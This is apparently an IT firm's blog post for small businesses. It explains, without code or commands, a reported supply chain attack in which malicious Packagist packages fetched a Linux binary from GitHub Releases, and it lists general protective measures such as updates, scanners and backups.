Cyber Attack via Software Packages: What This Means for Your SME

How Software Packages Become a Weak Link

Software development relies heavily on reusing existing pieces of code, often called 'packages'. This greatly speeds up the building of websites and applications. Companies use these packages, which are often available for free through platforms like Packagist, to work quickly and efficiently.

Unfortunately, this dependency on external code also makes your business vulnerable.

A new, coordinated attack has recently been discovered that exploits this system. Eight different software packages on Packagist, a popular platform for PHP development, have been infected with malicious code. These types of attacks, where criminals attempt to infiltrate your systems through the software supply chain, are called 'Supply Chain Attacks'.

They pose a growing threat to businesses of all sizes.

How the Attack Works Explained

In this specific attack, the malicious elements were not added to the main configuration files of the software (like composer. json), but rather to files related to JavaScript (package. json).

This is a clever move by the attackers, as JavaScript is a crucial component of many modern web applications. Projects that use JavaScript to enhance their functionality were directly targeted.

The infected packages then contained code that caused an additional, malicious program to be downloaded. This program was a so-called 'Linux binary', an executable file specifically designed to run on Linux systems. This download occurred from an external location, namely a GitHub Releases URL.

GitHub is a platform where developers worldwide share and manage their code, and the 'Releases' section is often used to make new versions of software available.

The presence of this Linux malware on GitHub as a 'release' is misleading. It resembles legitimate software, making it harder for security systems to detect. Once active on a system, this malware can do anything from stealing sensitive information to taking control of the server hosting the website.

The coordinated nature of the attack suggests a professional operation behind the scenes, aimed at maximizing impact.

What Does This Mean for Your SME Business?

As an SME, you may rely on similar software packages to run your website, online store, or internal applications. The risks of such an attack are significant and can have far-reaching consequences:

• Data Theft: Sensitive customer data, financial information, or trade secrets can fall into the wrong hands. This can lead to identity fraud, financial damage, and reputational damage.

• Business Interruption: The malicious code can make your systems inaccessible, resulting in a website being offline or applications no longer working. This can lead to lost revenue and dissatisfied customers.

• System Takeover: Hackers can gain control of your servers, allowing them to misuse the systems for further criminal activities, such as launching other attacks.

• Reputational Damage: A data breach or other security incidents can severely damage the trust of your customers and partners. Restoring this trust can be time-consuming and costly.

• Financial Costs: In addition to direct damage, there can also be costs for system cleanup, forensic investigation, legal advice, and informing affected parties.

It is crucial to take the risks associated with using external software components seriously. Even if you don't think you are a direct developer, the website you use or the software your employees use might indirectly depend on such packages.

How Can Your SME Protect Itself?

The complexity of modern software means that writing all the code yourself is often not feasible. Therefore, it's important to manage risks smartly. Here are some direct steps you can take:

• Check Your Software Suppliers: Ask your web builder or IT partner which packages they use and how they ensure their security. A transparent supplier is a good sign.

• Keep Software Up-to-Date: Ensure that all software used, including underlying frameworks and libraries, is always up-to-date. Developers regularly release updates to patch security vulnerabilities.

• Use Security Scanners: There are specialized tools that can scan your website and software for known vulnerabilities and infected components. Ask your IT partner about the possibilities.

• Minimize Dependencies: Only use the software packages you truly need. The fewer external components your system uses, the smaller the attack surface.

• Implement a Security Policy: Establish clear rules within your organization about software usage and security. Educate your employees about the risks.

• Regular Backups: Maintain reliable, external backups of your website and data. If something does go wrong, you can restore your systems quickly.

• Network Segmentation: Separate sensitive systems from less critical systems. This can prevent an attack from spreading rapidly throughout your entire network.

Conclusion

The recent supply chain attack on Packagist is a clear warning that malicious actors are using increasingly sophisticated methods to attack businesses. For SMEs, it is essential to be proactive. Understanding the risks, regular updates, and working with trusted IT partners are key to protecting your digital business operations.

Take security seriously, because a small weak link can cause major problems.

**Want to know more? ** Also see how Assist2go can help with the right IT service for your business.